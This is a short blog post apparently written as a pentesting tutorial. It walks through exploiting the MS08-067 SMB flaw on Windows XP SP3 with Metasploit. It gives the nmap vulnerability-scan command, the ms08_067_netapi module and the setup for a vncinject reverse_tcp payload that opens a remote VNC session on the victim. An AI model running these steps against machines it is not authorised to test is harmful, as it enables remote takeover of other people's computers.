Zer0 day

[Pentesting] XP sp3 Remote Exploit with ms08_067 본문


[Pentesting] XP sp3 Remote Exploit with ms08_067

Zero Day 2014. 4. 27. 02:39

- XP sp3 Remote Exploit with ms08_067


Vulnerability : MS08_067




Platforms : Windows 


Architectures : x86


Target : ( Windows XP sp3 )


Attacker : ( Linux BackTrack5-R3 )



- Process -

This time we will exploit Windows XP sp3 with ms08_067 vulnerability

MS08_067 :

When the system is requested RPC request, it allows Remote Code Executing.

Windows 2000, Windows XP, Windows Server 2003 has this Culnerability.

SO Hacker can execute any command to victim's pc without any verification.

1. First, we need to check the PC which might have MS08_067 Vuln with Nmap tool. 

   Because, If the vuln were already patched, we can't exploit.



 Command : nmap -sS -A --script=smb-check-vulns -PO [Victim's IP]
In this case, we can't exploit... so..
2. And We will use module called "ms08_067_netapi"
search ms08_067


USe it!
Cmd : use exploit/windows/smb/ms08_067_netapi
4. Setting Payload time!
This time we will use windows/vncinject/reverse_tcp payload.
Setting LHOST ( my ip ) LPORT ( MY port ) RPORT ( 445 )
        RHOST ( victim ip )


- Exploit Success!


if success at exploit, u can see vnc screen on your screen
- if u can't see vnc screen even success at exploit, vnc isn't installed on ur pc 



- End

댓글쓰기 폼
Prev 1 2 3 4 5 6 7 Next